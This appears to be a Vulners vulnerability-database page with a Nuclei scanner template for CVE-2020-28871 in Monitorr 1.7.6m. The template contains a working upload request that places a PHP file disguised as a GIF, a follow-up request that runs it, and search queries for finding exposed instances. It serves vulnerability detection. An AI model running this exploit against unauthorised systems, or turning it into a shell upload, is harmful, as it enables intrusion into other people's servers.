| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload Exploit | 23 Jun 202100:00 | – | zdt | |
| Monitorr 1.7.6 Shell Upload Exploit | 15 Feb 202300:00 | – | zdt | |
| Monitorr 1.7.6m / 1.7.7d Remote Code Execution Exploit | 23 Mar 202300:00 | – | zdt | |
| CVE-2020-28871 | 10 Feb 202100:00 | – | attackerkb | |
| CVE-2020-28871 | 10 Feb 202107:41 | – | circl | |
| Monitorr Code Issue Vulnerability | 10 Feb 202100:00 | – | cnnvd | |
| Monitorr Remote Code Execution (CVE-2020-28871) | 23 Feb 202100:00 | – | checkpoint_advisories | |
| CVE-2020-28871 | 10 Feb 202100:00 | – | cve | |
| CVE-2020-28871 | 10 Feb 202100:00 | – | cvelist | |
| Monitorr unauthenticated Remote Code Execution (RCE) | 22 Mar 202319:50 | – | metasploit |
id: CVE-2020-28871
info:
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.
remediation: |
Upgrade to a patched version of Monitorr or apply the necessary security patches.
reference:
- https://www.exploit-db.com/exploits/48980
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
- http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html
- http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28871
cwe-id: CWE-434
epss-score: 0.85785
epss-percentile: 0.99697
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: monitorr
product: monitorr
shodan-query: http.favicon.hash:"-211006074"
fofa-query: icon_hash="-211006074"
tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr,vuln
variables:
string: "CVE-2020-28871"
http:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/plain, */*; q=0.01
Connection: close
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}
-----------------------------31046105003900160576454225745
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
GIF89a213213123<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------31046105003900160576454225745--
- |
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(string)}}'
- type: status
status:
- 200
# digest: 490a0046304402201c2555c8808359d74e216a2d9c4d2bf14baa82bad1b6eb14362bb61673fcb8de02200da5cd20443927976d24379c10e088e43ca06308294e1cc4e57d5c82d55a28de:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation